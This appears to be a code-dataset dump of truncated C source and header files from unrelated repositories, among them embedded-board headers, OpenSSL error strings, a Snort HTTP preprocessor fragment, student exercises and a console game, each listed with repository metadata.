#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward d...
[ "brenocfg@gmail.com" ]
brenocfg@gmail.com
22c7eb7a69e82902e17c0525fe4cfd0469702d0d
58afe3ffbe68813f6e2e4facf5ff1f4955f92a2c
/C_Study_basic/1_CLI/1_beginner/4_operator/5_comma/1_67_basic.c
57556364d17e78f8b5a963dda2bab7d24449c794
[]
no_license
koobeomjin/iot_bigdata
08d9c1a645af0ab44aefb805b4115c0722956567
922000c38c99d804683c50b2404699da79637d26
refs/heads/master
2020-05-18T05:11:09.010268
2019-10-21T06:24:57
2019-10-21T06:24:57
184,195,560
0
0
null
null
null
null
UHC
C
false
false
156
c
#include <stdio.h> void main(){ int num1=7; int num2=9; printf("num1: %d\n", num1), printf("num2: %d\n", num2); // <= 더욱 추천하지 않는다. }
[ "abc12@naver.com" ]
abc12@naver.com
f4ab605c561a912c9dfacc33d4f145224d74e66b
4c0c96bf56a95d9c3ed95070d96408b4856ff29f
/src/file.h
e8db3a93f7c6115b2615ddfe62a224897cca8707
[]
no_license
JacksieCheung/Shop
db70c138f5f5f2c96b4a8bba1d5b8157ac489509
4edf3c63bb03cdef96c9bfeadeac90156c862b58
refs/heads/main
2023-02-05T20:13:58.549486
2020-12-24T14:20:29
2020-12-24T14:20:29
307,375,521
0
0
null
null
null
null
UTF-8
C
false
false
49
h
#include "errno.h" Status Save(); Status Read();
[ "1799902904@qq.com" ]
1799902904@qq.com
9a7d8601217e0104c34f50415560512508fa34fa
dc81960815d5ad47360ac66996eecd8abd2439d9
/odd num in list.c
b4b92d789841576e7a82fd98ae4b5c85f3f2cf53
[]
no_license
Sobiyamaran/datastructure
e0f506305e7bf7eb70904f0765ef65a99c16ee1e
a0e7b267ee9a20e430a3a3ce48f15dcc0ec5d1df
refs/heads/main
2023-06-21T14:22:43.734125
2021-07-29T11:34:17
2021-07-29T11:34:17
341,257,429
0
0
null
null
null
null
UTF-8
C
false
false
1,076
c
#include<stdio.h> #include<stdlib.h> struct node{ int data; struct node *next; }*head='NULL',*temp,*last; void main() { int max,n,i; struct node *newnode; int data; struct node *temp; //struct node *temp1; printf("enter the no of elements in list"); scanf("%d",&n); ...
[ "noreply@github.com" ]
Sobiyamaran.noreply@github.com
6dd2b6eba7e67463ea74086a0ecf420774dc9e03
1ba4abd0d77a1984117ed6abdb415f9993fdfe82
/nuttx/nuttx/configs/sama5d3-xplained/src/sama5d3-xplained.h
6d24bc53eb8065c6d7c3e54fed7e2d8ef8c4dbf9
[ "MIT", "BSD-3-Clause", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-other-permissive", "ISC" ]
permissive
vixadd/FMoto
5ce3ee3712212ac5dc40d2e05458bab1ffbb00eb
a266307517a19069813b3480d10073f73970c11b
refs/heads/master
2022-06-17T20:20:30.564111
2020-05-08T14:34:51
2020-05-08T14:34:51
103,983,945
4
0
null
null
null
null
WINDOWS-1252
C
false
false
22,688
h
/************************************************************************************ * configs/sama5d3-xplained/src/sama5d3-xplained.h * * Copyright (C) 2014 Gregory Nutt. All rights reserved. * Author: Gregory Nutt <gnutt@nuttx.org> * * Redistribution and use in source and binary forms, with or without * m...
[ "dkroell@acm.org" ]
dkroell@acm.org
4cde626a6ce676550a7eefb86aa46da246dfa550
b6e4cf9b01c9e7cb27cb53e3a59c1fa1432549a3
/htk.cuedrnnlm.v1.1/HLMLib/LUtil.h
f335ac0370a36f2e084ecc98a8d10e199ef1e710
[ "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-proprietary-license", "BSD-3-Clause" ]
permissive
JJorgeDSIC/CUED-RNNLM-Toolkit-Adapted
1e9048ce2cfe11a8e4517c9081f4168f8447191b
109937a2dc275403108271f1ff1735104eeee47a
refs/heads/master
2020-04-03T10:17:10.678061
2019-04-12T14:13:20
2019-04-12T14:13:20
155,188,877
1
0
BSD-3-Clause
2019-04-12T13:53:54
2018-10-29T09:55:44
C++
UTF-8
C
false
false
5,003
h
/* ----------------------------------------------------------- */ /* */ /* ___ */ /* |_| | |_/ SPEECH */ /* | | | | \ RECOGNITION ...
[ "jjorge@dsic.upv.es" ]
jjorge@dsic.upv.es
436252ef469bc7b3638d92b11f6213c966f0e0aa
8c3297c40cc4629e3db40cbeccdc11603d7b9a51
/source/lpc1769/inc/registers/interrupt.h
f8ec9bfc94f86cbff214bdd63fa6686fe7ab70ca
[ "MIT" ]
permissive
alexdauph/IPS-100
d5b5b3d753bc98dab5e52028a011440ffc5fe8ab
e83a7976b23ea2519e864c3c123f8a63b38c1a1c
refs/heads/main
2023-02-24T22:28:55.363898
2021-01-18T01:56:29
2021-01-18T01:56:29
300,675,923
0
0
null
null
null
null
UTF-8
C
false
false
2,247
h
#ifndef INTERRUPT_H_ #define INTERRUPT_H_ #include "stdint.h" static uint32_t volatile * const PtrISER0 = (uint32_t *) 0xE000E100; static uint32_t volatile * const PtrISER1 = (uint32_t *) 0xE000E104; static uint32_t volatile * const PtrICER0 = (uint32_t *) 0xE000E180; static uint32_t volatile * const PtrICER1 = (ui...
[ "dauphinais.alexandre@gmail.com" ]
dauphinais.alexandre@gmail.com
dbdaf43ff2823e99308f9e9eaf2f375700a4853e
eedbda4b73f561708625bc4665c3d15699ae7a59
/proproject/pro.c
95a59ada1290f0804e5e57aee2d18ea7fe7de64c
[]
no_license
kimsh153/c_proproject
e3fafd8e9f4f765f4b33f9ca1f5f7e5d5a48c7d6
e70a87d705949510907fef511d6eb50b8615ac58
refs/heads/master
2023-06-19T12:52:53.698333
2021-07-16T01:08:02
2021-07-16T01:08:02
386,466,525
0
0
null
null
null
null
UTF-8
C
false
false
43,063
c
#include <stdio.h> #include<Windows.h> #include <time.h> #include <stdlib.h> #include <process.h> #include <string.h> #pragma warning(disable : 4996) #define LEFT 75 #define RIGHT 77 #define UP 72 #define DOWN 80 #define SPACE 32 #define ENTER 13 int boom_x, boom_y; //폭탄 좌표 기억 int mon_x[4], mon_y[4]; //몬스터 좌표 기억 int ...
[ "sunghun4777@naver.com" ]
sunghun4777@naver.com
b04e40ab0916978a6a0623d26f236c05899d6266
fb3c1e036f18193d6ffe59f443dad8323cb6e371
/dependency/ssl/src/rsa_err.c
8a38dbd798b80043fd2c1a062e14190af4e6503d
[]
no_license
playbar/nstest
a61aed443af816fdc6e7beab65e935824dcd07b2
d56141912bc2b0e22d1652aa7aff182e05142005
refs/heads/master
2021-06-03T21:56:17.779018
2016-08-01T03:17:39
2016-08-01T03:17:39
64,627,195
3
1
null
null
null
null
UTF-8
C
false
false
10,038
c
/* crypto/rsa/rsa_err.c */ /* ==================================================================== * Copyright (c) 1999-2008 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions *...
[ "hgl868@126.com" ]
hgl868@126.com
bf31ea0b00c1ec2ed69f3fd77b171ba30e781f45
73f27de5ceee2a6d08d5090cc0078d46d3e7ffae
/2ºAno/AC2/Exercicios/EP/Cenas/P03/p3.c
6ce8099ca2270a1dceca9bcf35618ba9466479c1
[]
no_license
JPCGameiro/UA-ECT
5808aade4ebf41ca689b63854772cc2004c26461
7fdae2b6e9e8c81e1f1303b32d21e28bd555a56d
refs/heads/master
2023-01-29T21:51:32.583147
2023-01-17T21:10:35
2023-01-17T21:10:35
181,866,524
18
15
null
null
null
null
UTF-8
C
false
false
2,225
c
#include <detpic32.h> #define BUF_SIZE 16 #define INDEX_MASK (BUF_SIZE-1) typedef struct { unsigned char data[BUF_SIZE]; unsigned int tail; unsigned int head; unsigned int count; } circularBuffer; circularBuffer bf; void add_bf(char value) { if(bf.count == BUF_SIZE) printStr("Buffer ...
[ "noreply@github.com" ]
JPCGameiro.noreply@github.com
9bcd85f183e814c98f398eb9d4ddd78b9ef65dfe
b8a399651d326ece5481575934b43f38084bf39c
/src/CM1060-Lighting/ws2812b.c
fd69c25cdf563ff96443a4555c6c7b654e38326b
[]
no_license
evankrug/smart-lighting
b00b1a116126d854b818da9c3d103cbf3e7e9254
dc66d899d0691dace06e8359956e79675148183f
refs/heads/master
2020-07-07T20:47:29.869136
2019-08-21T20:43:59
2019-08-21T20:43:59
203,472,827
0
0
null
null
null
null
UTF-8
C
false
false
3,917
c
/* * ws2812b.c * * Created: 7/31/2019 1:16:07 PM * Author: 243400 */ #include "ws2812b.h" #include <avr/io.h> #include <avr/interrupt.h> #include <util/delay.h> // Actually send a bit to the string. We turn off optimizations to make sure the compile does // not reorder things and make it so the delay happens...
[ "evan.krug@spectrumbrands.com" ]
evan.krug@spectrumbrands.com
ab96fc1d6c2a502e8c5184aa6d9a9fe6429b7b29
6cb9f535c40a11a22a4abbfb3c05adb1fd8aec96
/N_C_BASIC/GRAPHICS/PISTON.C
346d2908e01c1047bd66c9eefee7b148e5f768c1
[]
no_license
ceontgroup/public-project
f77449a000176dfd4fdceaf65853d44fda217e7e
c311e143cad7d552cfdc47ce70cdbc61ba00e433
refs/heads/master
2016-08-11T18:06:59.377421
2013-06-02T17:46:36
2013-06-02T17:46:36
48,648,449
0
0
null
null
null
null
UTF-8
C
false
false
1,449
c
/* Minh hoa chuyen dong cua mot piston */ #include <conio.h> #include <graphics.h> #include <math.h> #include <dos.h> /* 1 / sqrt(2) */ #define FCT 0.7071067 /* he so doi tu do sang radian */ #define RADS 0.017453293 #define RADIUS1 50 #define SQRRADIUS1 2500 #define RADIUS2 150 #define SQRRADIUS2 22500...
[ "sualbk@gmail.com" ]
sualbk@gmail.com
1d03be1d891db915cb25fd413a9a517d491a14ec
e16f250499bfb29a4612163151ccb1090d4bf69f
/swap/Funciones/Comunicacion.h
8a63923b83fa6ee850722a468584d3468d033de1
[]
no_license
JARombola/TP-Operativos
b6928a0f9dcd628909303c2752c071a0969943b9
fdfaf9bc545e8573a9b11ae42f229a085ca8ee5f
refs/heads/master
2021-01-19T04:05:41.556897
2016-07-16T16:00:11
2016-07-16T16:00:11
64,695,547
0
0
null
null
null
null
UTF-8
C
false
false
958
h
/* * Comunicacion.h * * Created on: 21/5/2016 * Author: utnso */ #ifndef COMUNICACION_H_ #define COMUNICACION_H_ #include <stdio.h> #include <stdlib.h> #include <commons/string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <commons/config.h> typedef struct{ int puerto;...
[ "juli_fula@hotmail.com" ]
juli_fula@hotmail.com
f8533e1e936d129bb79a4aed859a57d0f13406b2
976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f
/source/libgit2/tests/status/extr_renames.c_test_status_renames__head2index_one.c
f66d741323d5b4614796b8eca8f89364bfdb65ee
[]
no_license
isabella232/AnghaBench
7ba90823cf8c0dd25a803d1688500eec91d1cf4e
9a5f60cdc907a0475090eef45e5be43392c25132
refs/heads/master
2023-04-20T09:05:33.024569
2021-05-07T18:36:26
2021-05-07T18:36:26
null
0
0
null
null
null
null
UTF-8
C
false
false
2,351
c
#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward d...
[ "brenocfg@gmail.com" ]
brenocfg@gmail.com
f65586027cb0fd8a89f2097f474b3e2420a1ad60
90df40c3272d6063dd8cadc46a4c5742b03e3c0c
/src/boot-class/lib/boot-class/000100000200058a/protected-all.h
7a84fe0fa396c662abbdbe08ebe5fff8dc01ae0e
[ "LicenseRef-scancode-warranty-disclaimer" ]
no_license
yoshiylife/OZonUnix
2026b86c82ab41930642ab7975c63b0605eaeef6
3903823a70d1b8ed231dea0b89136702a5063e53
refs/heads/master
2020-05-20T06:02:50.568176
2016-02-18T19:03:39
2016-02-18T19:03:39
null
0
0
null
null
null
null
UTF-8
C
false
false
924
h
#define _PROTECTED_ALL_000100000200058a_H #ifndef _OZ000100000200058aP_H_ #define _OZ000100000200058aP_H_ #define OZClassPart0001000002fffffd_0_in_0001000002000589 1 #define OZClassPart0001000002fffffe_0_in_0001000002000589 1 #define OZClassPart0001000002000589_0_in_0001000002000589 0 #define OZClassPart000000000000...
[ "yoshiylife@gmail" ]
yoshiylife@gmail
363df3f9e579069c0a3ae9aa0fa9ff8431212d97
ac362bb8969d647cd219430bc71c831d894e531c
/sys/dev/sun/event.c
de620facccbcd83c00f00229510774634e5a89b1
[]
no_license
noud/mouse-bsd-4.0.1
efb3b16fcc872ab227e6bb651cf1e836796a0804
4c0a1e08df407a759afac2d6a98507df94f5f814
refs/heads/master
2023-02-24T23:42:54.060718
2020-08-16T20:10:53
2020-08-16T20:10:53
334,536,412
0
0
null
null
null
null
UTF-8
C
false
false
5,900
c
/* $NetBSD: event.c,v 1.18 2005/12/11 12:23:56 christos Exp $ */ /* * Copyright (c) 1992, 1993 * The Regents of the University of California. All rights reserved. * * This software was developed by the Computer Systems Engineering group * at Lawrence Berkeley Laboratory under DARPA contract BG 91-66 and * contr...
[ "mouse@Rodents-Montreal.ORG" ]
mouse@Rodents-Montreal.ORG
2cde10f498355aa6ce70de330e6b6d7b451683bb
5792b184e71a9de7779e0bd21b6833f8ddfdb4b5
/sysvr4/svr4/cmd/deroff/deroff.c
6c33a6ae325c33332eb38d78044c38ec6b2b7ff7
[]
no_license
ryanwoodsmall/oldsysv
1637a3e62bb1b9426a224e832f44a46f1e1a31d4
e68293af91e2dc39f5f29c20d7e429f9e0cabc75
refs/heads/master
2020-03-30T06:06:30.495611
2018-09-29T09:04:59
2018-09-29T09:04:59
150,839,670
7
0
null
null
null
null
UTF-8
C
false
false
11,533
c
/* Copyright (c) 1990 UNIX System Laboratories, Inc. */ /* Copyright (c) 1984, 1986, 1987, 1988, 1989, 1990 AT&T */ /* All Rights Reserved */ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF */ /* UNIX System Laboratories, Inc. */ /* The copyright notice above does not evidence any */...
[ "rwoodsmall@gmail.com" ]
rwoodsmall@gmail.com
bed02550a2d39b68a31467a1735b6e927b6a6e07
852ea65d9d91b40c1ed1aa23aaccb6e2bfda4de8
/花样一 1:8个灯闪烁(延时)/light_flow.c
caf1e63357915442d91c9a7e4de7d3c612dcf064
[]
no_license
zhangxu128/Cplusplus
3a5f576e4cb820c4f37e2dfe8d7201f66f0d77ab
62c8f8492fc803e243e360b4038118b5a0ba6a2c
refs/heads/master
2022-02-15T04:26:57.908440
2019-08-15T15:14:16
2019-08-15T15:14:16
160,204,906
0
1
null
null
null
null
GB18030
C
false
false
1,645
c
//================================================================== //文件名称: LED显示函数 //功能说明: 发光二级管的闪烁 //硬件描述: P1口 //资源说明: 11.0592M晶体 //创建日期: 2015/11/13 //软件版本: v 1.1 //================================================================== //==========================包含头文件============================== #include <reg51...
[ "731172278@qq.com" ]
731172278@qq.com
e5938cce96656296b6b799cc0523d3e9fcfb6cc0
249839bed8656b791449ba3b0665a7bebceb9130
/vim/src/fold_c/fold_AICC_1156.c
a12df0cb1b4127b9428dd2054c829841abdacf78
[]
no_license
marcioaug/mutants
b597cf8d461f8e3d608765bcb766dc818a616575
41d65ac1c2c8a4feddaae473cbf58d3846617f99
refs/heads/master
2021-01-21T22:34:41.131530
2017-10-19T01:53:10
2017-10-19T01:53:10
102,151,857
0
0
null
null
null
null
UTF-8
C
false
false
92,245
c
/* vi:set ts=8 sts=4 sw=4 noet: * vim600:fdm=marker fdl=1 fdc=3: * * VIM - Vi IMproved by Bram Moolenaar * * Do ":help uganda" in Vim to read copying and usage conditions. * Do ":help credits" in Vim to see a list of people who contributed. * See README.txt for an overview of the Vim source code. */ /* * fol...
[ "marcioaugustosg@gmail.com" ]
marcioaugustosg@gmail.com
2102c4f5cabcb1daadf5ccb49eb5e40f083955db
49969e3dce3e6a00237f6ff362e41b486cf42ae1
/HW6/hostFE.c
4493e66c0b44116b9b34060630eff86fd07d5ec7
[]
no_license
iamch15542/Parallel_Programming
828ae2d4ea376e0599d63aa58229add3baefb014
41c754201e93d3b6ccd6619a2b5d7cc747dd221b
refs/heads/main
2023-02-12T20:13:39.765624
2021-01-16T05:56:38
2021-01-16T05:56:38
305,687,611
0
0
null
null
null
null
UTF-8
C
false
false
2,960
c
#include <stdio.h> #include <stdlib.h> #include "hostFE.h" #include "helper.h" void hostFE(int filterWidth, float *filter, int imageHeight, int imageWidth, float *inputImage, float *outputImage, cl_device_id *device, cl_context *context, cl_program *program) { cl_int status; i...
[ "kuso1112.cs06@nctu.edu.tw" ]
kuso1112.cs06@nctu.edu.tw
ba425601969d2d7810cc6013754f6cba6802a856
4502d7460e9c251e57d030a37bf20e2cee1327b0
/Proc1.c
142e7c934b1f16348196314ad0d91029e0cd24d8
[]
no_license
VictorKarma/Programas-Sistemas-operativos
02ab0753f23de3c52e6fd38a0038a3bbb736ca13
ae4e79b4902ee59ed10c4f15722e1c60e54af6d0
refs/heads/master
2020-09-17T11:05:22.763073
2019-11-29T04:40:14
2019-11-29T04:40:14
224,082,860
1
0
null
null
null
null
UTF-8
C
false
false
1,132
c
#include <stdio.h> #include <sys/types.h> #include <sys/ipc.h> #include <string.h> #include <errno.h> #include <sys/shm.h> /* shm* */ #define FILEKEY "/bin/cat" #define KEY 1300 #define MAXBUF 10 int main () { int key, i; int id_zone; int *buffer; char c; //LLava e para la memoria compartida key = ftok(FILEK...
[ "noreply@github.com" ]
VictorKarma.noreply@github.com
4cbd570933d067f7eba0aec5461c7dc63e8a9820
ac1c9fbc1f1019efb19d0a8f3a088e8889f1e83c
/out/release/gen/services/viz/public/mojom/hit_test/aggregated_hit_test_region.mojom-import-headers.h
f190350a8b7e494bf8b00ccd9b572ca74684ae42
[ "BSD-3-Clause" ]
permissive
xueqiya/chromium_src
5d20b4d3a2a0251c063a7fb9952195cda6d29e34
d4aa7a8f0e07cfaa448fcad8c12b29242a615103
refs/heads/main
2022-07-30T03:15:14.818330
2021-01-16T16:47:22
2021-01-16T16:47:22
330,115,551
1
0
null
null
null
null
UTF-8
C
false
false
973
h
// services/viz/public/mojom/hit_test/aggregated_hit_test_region.mojom-import-headers.h is auto generated by mojom_bindings_generator.py, do not edit // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #if...
[ "xueqi@zjmedia.net" ]
xueqi@zjmedia.net
77beac2088ba57808bc1d0f12b16ec2a853a8aa1
71e5f96a29f5d643ab888b37677d38c33f8d765d
/d/charucavern/charucavern/wormlair/inherits/wormtunnar2.c
9fa1fac84c054740dd34ed5f6c2c7a07acf8c9bb
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
Cherno-SuS/SunderingShadows
5f755fbebb79dc0b9d1c2a0541408be4afeb8b67
c3b4370beb2c4351ecc60826850c94892a42b685
refs/heads/main
2023-04-21T09:52:14.580024
2021-03-23T12:09:55
2021-03-23T12:09:55
349,490,686
0
0
NOASSERTION
2021-03-23T12:09:56
2021-03-19T16:40:12
null
UTF-8
C
false
false
2,833
c
#include <std.h> #include "area_stuff.h" #include <daemons.h> #include <move.h> #include </d/common/common.h> inherit WFALL; void create() { ::create(); set_name("A passageway through earth and stone"); set_short("%^RESET%^%^ORANGE%^A passageway through earth and %^BOLD%^%^WHITE%^stone%^RESET%^"); s...
[ "law@shadowgate.org" ]
law@shadowgate.org
69ce357819c9a6d07c7b6ef72e513e5a3a9afaeb
87a6573ee19fb12bc8aebcf2342d915a8cb6ff44
/tutorials/exercises/dcpids/snort-2.9.15/src/preprocessors/HttpInspect/client/hi_client_norm.c
8c5a916eb234d8484cad891af42468c857bdeaf5
[ "Apache-2.0", "GPL-2.0-only" ]
permissive
nabilabonasser/tutorials
1a36be6da6ec85e3e8d8031ee911d52b76679856
f71e9a595801c25efe7831eec5d99f51477ff99c
refs/heads/master
2020-09-25T09:10:41.068687
2019-12-17T10:36:38
2019-12-17T10:36:38
225,970,169
0
0
Apache-2.0
2019-12-04T22:39:53
2019-12-04T22:39:52
null
UTF-8
C
false
false
13,783
c
/**************************************************************************** * * Copyright (C) 2014-2019 Cisco and/or its affiliates. All rights reserved. * Copyright (C) 2003-2013 Sourcefire, Inc. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Pu...
[ "eng.nabil85@gmail.com" ]
eng.nabil85@gmail.com
15403a865cb87df2867126ed73924139f8480470
b049ec2f36bb63537ca5b73717635f2dc0126cda
/213_House_Robber_II/213.c
7aa64bf50acc11b6f0e503b5dc27a211a13443f6
[]
no_license
massquantity/LeetCode
01d29fe8922b7545140015efbda0f71b04043124
e298cdab86a4de81bf5a44579c54b5bc7bcb1618
refs/heads/master
2021-07-20T07:18:38.109707
2021-07-03T04:11:15
2021-07-03T04:11:15
135,297,184
3
1
null
null
null
null
UTF-8
C
false
false
499
c
inline int MAX(int a, int b) { return a > b ? a : b; } inline int robRange(int* nums, int start, int end) { int prev = 0, curr = 0; for (int i = end; i >= start; --i) { int tmp = curr; curr = MAX(prev + nums[i], curr); prev = tmp; } return curr; } int rob(int* nums, int num...
[ "wdmjjxg@163.com" ]
wdmjjxg@163.com
35f5701e8645131b306a9fd6e2c11182500f7b11
976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f
/source/linux/drivers/net/ethernet/mellanox/mlxsw/extr_spectrum_span.c_mlxsw_sp_span_entry_invalidate.c
f227f3036bee4f23c7c944d24dd8e7e745769178
[]
no_license
isabella232/AnghaBench
7ba90823cf8c0dd25a803d1688500eec91d1cf4e
9a5f60cdc907a0475090eef45e5be43392c25132
refs/heads/master
2023-04-20T09:05:33.024569
2021-05-07T18:36:26
2021-05-07T18:36:26
null
0
0
null
null
null
null
UTF-8
C
false
false
828
c
#define NULL ((void*)0) typedef unsigned long size_t; // Customize by platform. typedef long intptr_t; typedef unsigned long uintptr_t; typedef long scalar_t__; // Either arithmetic or pointer type. /* By default, we understand bool (as a convenience). */ typedef int bool; #define false 0 #define true 1 /* Forward d...
[ "brenocfg@gmail.com" ]
brenocfg@gmail.com
73b7d7a912b246cea5acd77e85fb6c6ea86ad12d
c76faa4bd9631d7b1dde3aa8cf1a5ece3e035a28
/extras/src/tk/generic/tkImgGIF.c
b8f7f7b446a2835585a4cfee33bddc695b68790e
[ "TCL" ]
permissive
GunioRobot/fsl
e5a01d9d9d477af931c3ef858163438d883e9b3b
5268b5cbc7434522571e04b5c3faf73ed5bce1ba
HEAD
2016-09-10T01:39:43.823129
2010-08-20T05:14:24
2010-08-20T05:14:24
3,315,212
0
0
null
null
null
null
UTF-8
C
false
false
54,065
c
/* * tkImgGIF.c -- * * A photo image file handler for GIF files. Reads 87a and 89a GIF * files. At present, there only is a file write function. GIF images * may be read using the -data option of the photo image. The data may be * given as a binary string in a Tcl_Obj or by representing * the data as BASE64 enc...
[ "dirk@caltech.edu" ]
dirk@caltech.edu
e8863ef99250c303fef807d5800bca71de2f9b1c
b6e1e63cc98893057a587b52f5450aa98668b2b6
/io2/seq.h
3b59de34c4cfdaf3bf4d9b22a54f858a7e7dc225
[ "Apache-2.0" ]
permissive
denidoank/avalonsailing
6556a2eb17b8b31686e9d1d79b03f89c66953605
8bc6d511e243ebd4fd90e7fb678ac7560226b5ca
refs/heads/master
2016-08-04T08:13:58.442815
2013-02-13T07:49:56
2013-02-13T07:49:56
35,989,218
0
0
null
null
null
null
UTF-8
C
false
false
1,491
h
// Copyright 2011 The Avalon Project Authors. All rights reserved. // Use of this source code is governed by the Apache License 2.0 // that can be found in the LICENSE file. // // Methods for sequencing writes and reads to EPOS control registers. // #include <stdint.h> struct EposCmd { uint32_t index; ...
[ "lvd@google.com@5a7ef71c-b2ad-d1f0-6a96-1ca193062fb2" ]
lvd@google.com@5a7ef71c-b2ad-d1f0-6a96-1ca193062fb2
7095dc75c1b9e832f4548754644f371b81588c53
a9aa074f0d0bbbd75bc5ea72c4a60c3985407762
/heagen/lib/xronos/fits/xrftgcol.c
63c80f6404cc78da19f273545ca9321e9526cc45
[]
no_license
Areustle/heasoft-6.20
d54e5d5b8769a2544472d98b1ac738a1280da6c1
1162716527d9d275cdca064a82bf4d678fbafa15
refs/heads/master
2021-01-21T10:29:55.195578
2017-02-28T14:26:43
2017-02-28T14:26:43
83,440,883
0
1
null
null
null
null
UTF-8
C
false
false
4,028
c
/* * xrftgcol.c */ #include "xronos.h" int xrftgcol(fitsfile *fptr, XRFile *file, int *status) { /* * Looks at column header keywords to find a match * with various strings. The columns it searches for are: * * Quantity Search string *----------------------------------------------- * ...
[ "alexander.w.reustle@nasa.gov" ]
alexander.w.reustle@nasa.gov
1417b6a929ddc478ab041f87d2b99257a42b37a5
1be305e5b894c14e779c8f9695aca28354238cc7
/d/realm/mon/shillast.c
dc1438129fa7b3d5b05b90c344e5601f4ee1f304
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
guille-valencia/shadowgate
59009f8eda3fed948bb42518f95ba9c40966a79c
a5c63b535e50020b58435d6fbb5b4f60d8f25639
refs/heads/master
2022-12-23T10:16:05.889518
2020-09-21T20:33:50
2020-09-21T20:33:50
282,427,263
0
0
NOASSERTION
2020-09-21T06:05:44
2020-07-25T11:08:25
C
UTF-8
C
false
false
7,433
c
#include <std.h> #include "../inherits/area_stuff.h" inherit MONSTER; void create() { object wpn1; ::create(); set_name("shill'ast"); set_id(({"shillast", "shill'ast", "beast"})); set_short("%^MAGENTA%^Sh%^BOLD%^i%^RESET%^"+ "%^MAGENTA%^ll%^BOLD%^'a%^RESET%^%^MAGENTA%^"+ "st, The - %^BOLD%^%^YELLOW%^UNB...
[ "law@shadowgate.org" ]
law@shadowgate.org
a7c7fd5ae42f58a6b7c8ab60d5dec1550f8c2782
fb1a67bb783914689d1ecb5b1dfb4965883f9463
/gramado/kernel/socket/local/bottom/dd/nhid/arch/x86/pit.c
3d15970cfea82057e3483c6a431e7716f5e0e062
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
abdullah-19/gramado
f253dcb6754532f67267b22d75b54973e96df5d5
d64e7c043c68e85c8b93505a34fbe2563fbced1a
refs/heads/master
2022-11-16T18:22:56.800727
2020-07-18T01:18:08
2020-07-18T01:18:08
280,649,087
2
0
BSD-2-Clause
2020-07-18T12:11:02
2020-07-18T12:11:01
null
ISO-8859-1
C
false
false
19,521
c
/* * File: timer.c * * Descrição: * Arquivo principal do driver do PIT. * Trara a irq0. * Rotinas envolvendo tempo. * * Ambiente: * (RING 0). * Módulo interno, dentro do kernenel base. * * @todo: Criar funções que criam a estrutura timer ... * que será usada peloa aplicativos na ...
[ "freddynora@gmail.com" ]
freddynora@gmail.com
ed67b306f19c0530f29bdcdc3e57bc4e94d6f175
099125525f25327f4e50c492dd27b425d95428a5
/sys/arch/sparc64/include/signal.h
b5a2122f72e7e5bc8a4b2d73ddcfb1c0b34faf07
[]
no_license
bradla/OpenBSD-Hammer2
2d9223e167347fea59afc7866deb8c5e9c7bd167
3cdc26721c09a4e3b6c18086d544a386330af59d
refs/heads/master
2021-01-21T05:05:20.249320
2014-10-18T07:27:28
2014-10-18T07:27:28
19,660,090
18
2
null
null
null
null
UTF-8
C
false
false
3,776
h
/* $OpenBSD: signal.h,v 1.11 2013/04/01 17:18:20 deraadt Exp $ */ /* $NetBSD: signal.h,v 1.10 2001/05/09 19:50:49 kleink Exp $ */ /* * Copyright (c) 1992, 1993 * The Regents of the University of California. All rights reserved. * * This software was developed by the Computer Systems Engineering group * at Lawren...
[ "brad@Brads-MacBook-Pro-2.local" ]
brad@Brads-MacBook-Pro-2.local
970f9945eb864cbcf1735db4f2faa64f976623be
de6604045fb627b86b6bb03c9f99fc69ed01a954
/pg/AGGREGATE/pg_json_object_agg.c
2f2c283db45623333402d90098038cad33a5e7b7
[ "MIT" ]
permissive
sfaroult/sqlite_libs
a522433a39c6352c2fcc11f6d7369face2f600f8
c9d3937ce1756eab4c8d9dab5aede889393830e8
refs/heads/master
2016-09-14T08:26:24.877481
2016-05-18T19:42:46
2016-05-18T19:42:46
59,128,508
7
3
null
null
null
null
UTF-8
C
false
false
3,143
c
#include <stdio.h> #include <strings.h> #include <ksu_common.h> #define CHUNK 100 typedef struct { char *aggr; // Null if default separator int sz; int len; } STRING_AGG_CONTEXT_T; extern void pg_json_object_agg_step(sqlite3_context *context, int ar...
[ "sfaroult@roughsea.com" ]
sfaroult@roughsea.com
e80ea0c9a87a3eb74f91cdc39ef2ebf60b22a799
9b0835b4b0ea3cb8dcb69b4189d6e70ea479df07
/os/anonymous_pipe.c
0e54d75feade51e53f1937022409f5cee6f89562
[]
no_license
itabas016/homework
78329dcfbefaa0653414ec04e60c144f9b63ebd2
494466bd9b2fcbcd9460d7690169c74538f565a4
refs/heads/master
2021-09-14T21:47:07.607361
2018-05-20T10:44:09
2018-05-20T10:44:09
73,827,963
1
0
null
null
null
null
UTF-8
C
false
false
1,542
c
#include <unistd.h> #include <sys/types.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_DATA_LEN 256 #define DELAY_TIME 1 int main() { pid_t pid; int pipe_fd[2]; char buf[MAX_DATA_LEN]; const char data[] = "Pipe Test Program"; int real...
[ "jesuie@live.cn" ]
jesuie@live.cn
c3f3ee01833aa16d03dd32e2a14355f013fad345
4ae3b3d44d1599e71fee449b8678e74cf8cecb69
/daemons.c
ba9430d53f9b2876defe65bd874b2ef1f61a9b21
[ "BSD-2-Clause" ]
permissive
lynn/la-lebna
61ad291dbae04cc4a9ee070cdcd54005f843e14c
fc6e06c24b373f2e6ffb40f56a0d0ff15759632e
refs/heads/master
2021-03-30T18:09:17.481641
2016-12-28T22:42:18
2016-12-28T22:42:18
70,929,856
4
1
null
